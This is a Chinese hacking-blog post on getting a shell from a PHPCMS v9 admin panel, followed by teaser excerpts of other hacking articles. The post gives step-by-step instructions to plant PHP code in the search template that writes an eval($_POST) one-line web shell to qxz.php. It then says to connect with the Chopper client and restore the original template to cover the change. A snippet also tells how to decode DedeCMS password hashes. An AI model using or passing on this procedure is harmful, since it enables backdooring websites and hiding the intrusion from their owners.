记一次phpcms v9后台拿shell过程
登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:
然后点击 search 这个文件夹,如下图:
然后点击修改 index.html 文件
然后把以下代码复制上去提交。
<?
$fp = @fopen(“qxz.php”, ‘a’);
@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[hacker])’.”\r\n\r\n?”.”>\r\n”);
@fclose($fp);
?>
提示:修改前先把原来的代码备份一下,拿到shell后把他改回去。
提交后点击可视化一下
这样在网站的根目录就生成了你的一句话木马客户端 qxz.php
拿起菜刀链接 http://www.xxx.com/qxz.php
作为网络爱好者,我们中的很多人都有一个黑客梦,就如同多数男孩都有一个武侠梦。黑客们凭借着高超的电脑技术、来无影去无踪的身手,宛如一个个武艺高超,轻功卓越的大侠在我们眼前飘过,令人心驰神往,却又可遇而不...
Wireshark是一款十分时兴的网络抓包分析系统,作用十分强劲。能够提取各种各样互联网封包,显示信息互联网封包的详细资料。wireshark是十分时兴的互联网封包分析系统,作用十分强劲。应用wir...
黑客是需要不断学习的,一旦网上出现了新的技术,黑客就有了新的工作,他们必须在很短的时间内了解该技术的最基本的进程,这里说的 就是掌握干技术的核心技巧,,深入的了解该程序的运转,如果一个黑客停止了对...
因为端口转发的牵涉到的专业知识和专用工具过多,因此大家分篇数而言,这篇主要讲讲该机的2个端口号中间怎样相互之间分享?里面的技术性倒是非常简单,你不用担心你学不懂。 因为端口转发一般是分...
解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。 后台:默认的是dede/login.php 有时后台也可以利用http://chncto.com/include/fcke...
先给大伙说一下XSS的技术专业表述吧! 什么叫XSS进攻? 每每程序运行的新网页页面中包括不会受到信赖的、未历经适当认证或转义的数据信息,或是应用能够建立JavaScript 的电脑浏...